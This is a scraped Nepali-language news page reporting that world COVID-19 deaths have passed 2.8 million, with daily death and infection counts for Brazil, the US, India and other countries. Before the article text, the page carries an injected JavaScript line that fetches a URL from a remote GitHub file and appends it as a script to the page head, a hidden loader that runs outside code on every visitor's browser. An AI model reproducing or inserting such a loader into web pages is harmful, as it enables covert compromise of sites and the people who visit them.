;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); विश्वमा कोरोनाबाट मृत्यु हुनेको संख्या २८ लाख नाघ्यो‚ ब्राजिलमा एकै दिन दुई हजारको मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • विश्वमा कोरोनाबाट मृत्यु हुनेको संख्या २८ लाख नाघ्यो‚ ब्राजिलमा एकै दिन दुई हजारको मृत्यु
अन्तर्राष्ट्रिय

विश्वमा कोरोनाबाट मृत्यु हुनेको संख्या २८ लाख नाघ्यो‚ ब्राजिलमा एकै दिन दुई हजारको मृत्यु

चैत १७,

विश्वभर कोरोना संक्रमणले मृत्यु हुनेको संख्या २८ लाख नाघेको छ । पछिल्लो २४ घण्टामा सात हजार ९२ जनाको मृत्यु भएसँगै कुल मृतकको संख्या २८ लाख तीन हजार ५७३ पुगेको हो। ब्राजिलमा एकै दिन झण्डै दुई हजारजना कोरोना संक्रमितको मृत्यु भएको छ। अमेरिकामा ६२७, इटलीमा ४१७, फ्रान्समा ३६०, रसियामा २९३, भारतमा २६६, टर्कीमा १५४ र जर्मनीमा १३१ जनाको मृत्यु भएको छ।

यस्तै‚ पछिल्लो २४ घण्टामा चार लाख १७ हजारजनाभन्दा बढी संक्रमित थपिएका छन्। भारतमा ५६ हजारभन्दा बढी संक्रमित थपिएसँगै त्यहाँ कुल संक्रमितको संख्या एक करोड २१ लाख नजिक पुगेको छ।

अमेरिकामा पनि एकै दिन ५६ हजार १०० जनामा नयाँ संक्रमण देखिएको छ। योसँगै त्यहाँ कुल संक्रमितको संख्या तीन करोड १० लाख ३० हजार पुगेको छ।

गत २४ घण्टामा ब्राजिलमा ४२ हजार ६००, टर्कीमा ३२ हजार ४००, जर्मनीमा १० हजार, इटलीमा १३ हजार, फ्रान्समा नौ हजार र रसियामा आठ हजार ७०० जना नयाँ संक्रमित थपिएका छन्।

हालसम्म विश्वभर कुल संक्रमितको संख्या १२ करोड ८२ लाख नाघेको छ। जसमध्ये १० करोड ३४ लाख मानिस संक्रमणमुक्त भइसकेका छन्।

फेसबुक प्रतिक्रियाहरु